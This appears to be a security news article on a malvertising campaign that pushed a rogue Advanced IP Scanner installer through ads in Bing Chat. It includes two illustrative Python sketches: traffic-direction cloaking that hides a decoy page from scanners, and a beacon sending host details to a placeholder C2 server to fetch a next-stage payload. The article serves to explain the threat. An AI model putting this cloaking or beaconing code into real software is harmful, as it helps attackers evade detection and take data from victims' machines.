Malwarebytes has discovered that malicious ads are being used to distribute malware through Microsoft Bing’s artificial intelligence (AI) chatbot, Bing Chat.
Introduced by Microsoft in February 2023, Bing Chat is powered by OpenAI’s GPT-4 language model and offers an interactive, conversational search experience. Threat actors, however, have exploited the ads served within these conversations to push malware to unsuspecting users.
Ads can be inserted into Bing Chat conversations: when a user hovers over a link in a response, an ad is displayed before the organic result. These sponsored links can send users to fraudulent sites, ultimately resulting in the installation of malware.
In one documented case, a Bing Chat query for the legitimate utility Advanced IP Scanner returned a link that displayed a malicious ad when hovered over. Clicking on the ad took users to a traffic direction system (TDS), which fingerprinted the request to weed out bots and analysis environments before redirecting genuine visitors to a decoy page hosting the rogue installer.
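To make the role of the TDS more concrete, the following Python sketch shows the kind of server-side filtering such systems typically perform. It is a minimal illustration, not code from the actual campaign: the IP prefixes, user-agent markers, and URLs are all hypothetical placeholders.

```python
# Hypothetical sketch of the filtering logic a traffic direction system (TDS)
# might apply. All indicators, thresholds, and URLs are illustrative only.

DATACENTER_PREFIXES = ("34.", "35.", "52.")      # crude stand-in for cloud/scanner IP ranges
HEADLESS_MARKERS = ("headless", "curl", "python-requests", "bot")

DECOY_PAGE = "https://decoy.example/download"            # fake vendor page serving the rogue installer
LEGIT_PAGE = "https://www.advanced-ip-scanner.com/"      # real site shown to filtered-out visitors


def route_visitor(ip: str, user_agent: str, accept_language: str) -> str:
    """Return the URL a visitor is redirected to, based on simple fingerprinting."""
    ua = user_agent.lower()

    # Obvious automation (crawlers, sandboxes, security scanners) is sent to the
    # real site, so the campaign stays invisible to analysts.
    if any(marker in ua for marker in HEADLESS_MARKERS):
        return LEGIT_PAGE

    # Traffic from well-known datacenter ranges is treated as analysis infrastructure.
    if ip.startswith(DATACENTER_PREFIXES):
        return LEGIT_PAGE

    # Requests with no language header look scripted rather than like a real browser.
    if not accept_language:
        return LEGIT_PAGE

    # Everyone else is treated as a plausible victim and sent to the decoy page.
    return DECOY_PAGE


if __name__ == "__main__":
    print(route_visitor("203.0.113.7", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "en-AU"))
    print(route_visitor("34.120.0.9", "python-requests/2.31", ""))
```

The point of this gatekeeping is that security crawlers and sandboxes only ever see the legitimate site, which makes the malicious redirect harder to detect and take down.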
This installer runs a Visual Basic Script that communicates with an external server, likely for the delivery of the next-stage payload. The exact nature of the malware being distributed remains unknown.
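For illustration, the sketch below shows the general shape of that beaconing step in Python (the campaign itself used a Visual Basic Script); the server URL and the details sent are hypothetical stand-ins, since the actual payload and infrastructure have not been identified.

```python
# Illustrative sketch of the beaconing pattern described above, written in Python
# for readability. The server address, parameters, and response handling are
# hypothetical placeholders, not indicators from the real campaign.

import platform
import urllib.parse
import urllib.request

C2_URL = "https://c2.example/gate.php"   # placeholder for the attacker-controlled server


def beacon() -> bytes:
    """Send basic host details to the remote server and return its response,
    which in a real attack would typically be (or point to) a next-stage payload."""
    params = urllib.parse.urlencode({
        "host": platform.node(),
        "os": platform.platform(),
    })
    with urllib.request.urlopen(f"{C2_URL}?{params}", timeout=10) as resp:
        return resp.read()
```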
Notably, the threat actor behind this campaign infiltrated the ad account of a legitimate Australian business to create the malicious ads. This tactic highlights the ongoing risk posed by malvertising, as users can be easily tricked into downloading malware from convincing landing pages.